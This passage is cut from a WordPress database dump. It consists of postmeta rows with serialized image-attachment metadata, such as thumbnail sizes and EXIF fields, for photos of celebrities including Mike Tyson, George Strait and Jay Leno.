ght\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:22:\"Mike-Tyson-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:22:\"Mike-Tyson-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:22:\"Mike-Tyson-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:22:\"Mike-Tyson-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:22:\"Mike-Tyson-696x460.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:460;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:22:\"Mike-Tyson-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:22:\"Mike-Tyson-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:22:\"Mike-Tyson-636x420.jpg\";s:5:\"width\";i:636;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(418,85,'_wp_attachment_image_alt','Mike Tyson'),(419,44,'_thumbnail_id','85'),(421,86,'_wp_attached_file','2015/05/Miranda-Cosgrove.jpg'),(422,86,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:651;s:4:\"file\";s:28:\"2015/05/Miranda-Cosgrove.jpg\";s:5:\"sizes\";a:19:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"Miranda-Cosgrove-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"Miranda-Cosgrove-300x244.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:244;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"Miranda-Cosgrove-768x625.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:625;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:26:\"Miranda-Cosgrove-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:27:\"Miranda-Cosgrove-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:28:\"Miranda-Cosgrove-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:28:\"Miranda-Cosgrove-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:28:\"Miranda-Cosgrove-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:28:\"Miranda-Cosgrove-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:28:\"Miranda-Cosgrove-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:28:\"Miranda-Cosgrove-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:28:\"Miranda-Cosgrove-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:28:\"Miranda-Cosgrove-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:28:\"Miranda-Cosgrove-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:28:\"Miranda-Cosgrove-696x566.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:566;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:28:\"Miranda-Cosgrove-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:28:\"Miranda-Cosgrove-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:28:\"Miranda-Cosgrove-800x580.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:28:\"Miranda-Cosgrove-516x420.jpg\";s:5:\"width\";i:516;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(423,86,'_wp_attachment_image_alt','Miranda Cosgrove'),(424,45,'_thumbnail_id','86'),(427,87,'_wp_attached_file','2015/05/George-Strait.jpg'),(428,87,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:683;s:4:\"file\";s:25:\"2015/05/George-Strait.jpg\";s:5:\"sizes\";a:20:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"George-Strait-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"George-Strait-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"George-Strait-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"George-Strait-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:23:\"George-Strait-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:24:\"George-Strait-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:25:\"George-Strait-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:25:\"George-Strait-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:25:\"George-Strait-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:25:\"George-Strait-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:25:\"George-Strait-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:25:\"George-Strait-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:25:\"George-Strait-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:25:\"George-Strait-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:25:\"George-Strait-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:25:\"George-Strait-696x464.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:464;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:25:\"George-Strait-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:25:\"George-Strait-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:26:\"George-Strait-1024x580.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:25:\"George-Strait-630x420.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(429,87,'_wp_attachment_image_alt','George Strait'),(430,46,'_thumbnail_id','87'),(434,88,'_wp_attached_file','2015/05/Ray-Lewis.jpg'),(435,88,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:600;s:4:\"file\";s:21:\"2015/05/Ray-Lewis.jpg\";s:5:\"sizes\";a:19:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"Ray-Lewis-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"Ray-Lewis-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"Ray-Lewis-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:19:\"Ray-Lewis-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:20:\"Ray-Lewis-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:21:\"Ray-Lewis-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:21:\"Ray-Lewis-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:21:\"Ray-Lewis-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:21:\"Ray-Lewis-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:21:\"Ray-Lewis-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:21:\"Ray-Lewis-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:21:\"Ray-Lewis-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:21:\"Ray-Lewis-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:21:\"Ray-Lewis-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:21:\"Ray-Lewis-696x522.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:522;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:21:\"Ray-Lewis-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:21:\"Ray-Lewis-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:21:\"Ray-Lewis-800x580.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:21:\"Ray-Lewis-560x420.jpg\";s:5:\"width\";i:560;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:17:\"Eugene_Onischenko\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1407415327\";s:9:\"copyright\";s:14:\"(067)-657-2802\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:1:{i:0;s:419:\"Jumping, USA, Activity, Floodlit, Uniform, Athlete, Professional Sport, Soccer, American Football, Outdoors, Lifestyles, Sport, Full, Sports Team, Event, Playing Field, Stadium, Sky, Night, People, Muscular Build, Traditional Culture, Teamwork, Effort, Playing, Adult, Grass, Quarterback, Touchdown, Men, Running, Spectator, Competition, Rivalry, Success, Action, Aggression, Strength, Energy, Caucasian, Sports Uniform\";}}}'),(436,88,'_wp_attachment_image_alt','Ray Lewis'),(437,47,'_thumbnail_id','88'),(439,89,'_wp_attached_file','2015/04/Casey-Kasem-Renowned-Radio-Host.jpg'),(440,89,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:849;s:6:\"height\";i:565;s:4:\"file\";s:43:\"2015/04/Casey-Kasem-Renowned-Radio-Host.jpg\";s:5:\"sizes\";a:18:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:43:\"Casey-Kasem-Renowned-Radio-Host-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:43:\"Casey-Kasem-Renowned-Radio-Host-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:43:\"Casey-Kasem-Renowned-Radio-Host-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:41:\"Casey-Kasem-Renowned-Radio-Host-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:42:\"Casey-Kasem-Renowned-Radio-Host-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:43:\"Casey-Kasem-Renowned-Radio-Host-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:43:\"Casey-Kasem-Renowned-Radio-Host-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:43:\"Casey-Kasem-Renowned-Radio-Host-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:43:\"Casey-Kasem-Renowned-Radio-Host-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:43:\"Casey-Kasem-Renowned-Radio-Host-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:43:\"Casey-Kasem-Renowned-Radio-Host-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:43:\"Casey-Kasem-Renowned-Radio-Host-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:43:\"Casey-Kasem-Renowned-Radio-Host-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:43:\"Casey-Kasem-Renowned-Radio-Host-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:43:\"Casey-Kasem-Renowned-Radio-Host-696x463.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:463;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:43:\"Casey-Kasem-Renowned-Radio-Host-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:43:\"Casey-Kasem-Renowned-Radio-Host-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:43:\"Casey-Kasem-Renowned-Radio-Host-631x420.jpg\";s:5:\"width\";i:631;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 5D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1171587568\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"160\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:15:\"0.0333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(441,89,'_wp_attachment_image_alt','Casey Kasem - Renowned Radio Host'),(442,48,'_thumbnail_id','89'),(444,90,'_wp_attached_file','2015/04/Jay-Leno.jpg'),(445,90,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:768;s:4:\"file\";s:20:\"2015/04/Jay-Leno.jpg\";s:5:\"sizes\";a:20:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"Jay-Leno-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"Jay-Leno-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"Jay-Leno-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"Jay-Leno-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:18:\"Jay-Leno-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:19:\"Jay-Leno-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:20:\"Jay-Leno-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:20:\"Jay-Leno-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:20:\"Jay-Leno-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:20:\"Jay-Leno-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:20:\"Jay-Leno-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:20:\"Jay-Leno-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:20:\"Jay-Leno-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:20:\"Jay-Leno-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:20:\"Jay-Leno-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:20:\"Jay-Leno-696x522.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:522;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:20:\"Jay-Leno-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:20:\"Jay-Leno-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:21:\"Jay-Leno-1024x580.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:20:\"Jay-Leno-560x420.jpg\";s:5:\"width\";i:560;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(446,90,'_wp_attachment_image_alt','Jay Leno'),(447,50,'_thumbnail_id','90'),(449,91,'_wp_attached_file','2015/04/Jerry-Seinfeld.jpg'),(450,91,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:792;s:6:\"height\";i:595;s:4:\"file\";s:26:\"2015/04/Jerry-Seinfeld.jpg\";s:5:\"sizes\";a:19:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Jerry-Seinfeld-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Jerry-Seinfeld-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"Jerry-Seinfeld-768x577.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:24:\"Jerry-Seinfeld-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:25:\"Jerry-Seinfeld-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:26:\"Jerry-Seinfeld-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:26:\"Jerry-Seinfeld-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:26:\"Jerry-Seinfeld-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:26:\"Jerry-Seinfeld-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:26:\"Jerry-Seinfeld-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a: